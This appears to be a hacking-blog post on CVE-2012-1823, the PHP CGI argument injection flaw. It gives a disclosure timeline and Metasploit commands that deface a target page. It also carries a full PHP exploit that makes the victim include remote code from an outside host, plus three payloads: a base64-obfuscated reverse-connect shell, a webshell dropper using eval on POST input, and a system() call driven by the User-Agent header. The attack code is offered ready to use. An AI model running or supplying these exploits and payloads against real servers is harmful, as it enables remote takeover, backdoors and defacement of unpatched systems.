CVE-2012-1823 PHP CGI Argument Injection Metasploit Demo

Timeline :

Vulnerability discovered at Nullcon Hackim 2012 by eindbazen the 2012-01-13
Vulnerability reported to the vendor the 2012-01-17
Vulnerability accidentally disclosed on PHP bug tracking system the 2012-05-03
Coordinated public release of the vulnerability the 2012-05-03
Metasploit PoC provided the 2012-05-04

PoC provided by :

egypt
hdm

Reference(s) :

CVE-2012-1823
OSVDB-81633

Affected version(s) :

PHP versions before 5.3.12
PHP versions before 5.4.2

Tested on CentOS release 6.2 (Final) with :

php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012

Description :

When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.”

Note : This vulnerability was potentially exploited in the wild for at least 8 years !

Commands :

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo \"owned\">/var/www/html/owned.html
exploit

EXPLOIT：


PHP Code:

<?php  /* *PHP CGI Argument Injection Exploit CVE-2012-1823 *by:cfking@90sec.org *Team:www.90sec.org */ set_time_limit(0);  $help=' [>] php-cgi Remote code Execution Exploit CVE-2012-1823 [>] by:cfking@90sec.org [>] Usage: php '.$argv[0].' host index.php <1/2/3> <ip/Command> <port> [>] Example: php '.$argv[0].' 127.0.0.1 / 2 ';  if($argc<4)exit($help); print_r (' [>] PHP CGI Argument Injection Exploit CVE-2012-1823 [>] by:cfking@90sec.org'); $host=$argv[1]; $filename=$argv[2];  if($argv[3]=='1'){ $port=$argv[5]? $argv[5]:4444;  if(!$argv[4])exit("\n[-] Please enter IP and PORT\n"); print "\n[+] Bindshell IP $argv[4] PORT $port\n"; $payload=$argv[4].':'.$port; $target='http://www.cj360.cn/plus/cmd.php'; }  if($argv[3]=='2'){ print "\n[+] Upload backdoor test.php\n"; $payload=''; $target='http://www.cj360.cn/plus/cmd.txt'; }  if($argv[3]=='3'){ if(!$argv[4])exit("\n[-] Please enter Command\n"); print "\n[+] Command $argv[4]\n"; $payload=$argv[4]; $target='http://www.cj360.cn/plus/cmds.txt'; }  ob_start();  $sock = fsockopen($host, 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)\n");   fwrite($sock, "GET /$filename?-d+allow_url_include%3don+-d+auto_prepend_file%3d$target+-d+disable_functions%3doff HTTP/1.1\r\n"); fwrite($sock, "User-Agent: $payload\r\n"); fwrite($sock, "Host: $host\r\n\r\n");  $headers = ""; while ($str = trim(fgets($sock, 4096)))      $headers .= "$str\n"; echo "\n"; $body = ""; while (!feof($sock))      $body .= fgets($sock, 4096);  fclose($sock);  echo $body; ob_end_flush();  ?>

500 error using the php://input will 
Therefore, the use of Remote File Inclusion

Usage: <1/2/3> <ip/Command> <port> 

Can modify the Remote URL of the inside
Remote Code :

Bindshell 


PHP Code:

<?php  $target='PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRhcnJheT1leHBsb2RlKCc6JywkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyRpcCA9ICRhcnJheVswXTskcG9ydCA9ICRhcnJheVsxXTskaXBmID0gQUZfSU5FVDtpZiAoRkFMU0UgIT09IHN0cnBvcygkaXAsICI6IikpIHsJJGlwID0gIlsiLiAkaXAgLiJdIjsJJGlwZiA9IEFGX0lORVQ2O31pZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsJJHNfdHlwZSA9ICdzdHJlYW0nO30gZWxzZWlmICgoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoJGlwLCAkcG9ydCk7CSRzX3R5cGUgPSAnc3RyZWFtJzt9IGVsc2VpZiAoKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsJJHMgPSAkZigkaXBmLCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7CSRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOwlpZiAoISRyZXMpIHsgZGllKCk7IH0JJHNfdHlwZSA9ICdzb2NrZXQnO30gZWxzZSB7CWRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7fWlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfXN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhaztjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazt9aWYgKCEkbGVuKSB7CWRpZSgpO30kYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyRsZW4gPSAkYVsnbGVuJ107JGIgPSAnJzt3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsJc3dpdGNoICgkc190eXBlKSB7IAljYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CWNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsJfX0kR0xPQkFMU1snbXNnc29jayddID0gJHM7JEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTtldmFsKCRiKTtkaWUoKTsgZXhpdDs/Pg=='; echo $code=base64_decode($target); ?>

Upload webshell：


PHP Code:

<?php $file = fopen("test.php","w"); fwrite($file,'<?php eval($_POST[\'cmd\'])?>'); fclose($file); echo "webshell Write successful"; exit; ?>

Command execution：


PHP Code:

<?php system($_SERVER["HTTP_USER_AGENT"]); exit; ?>

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking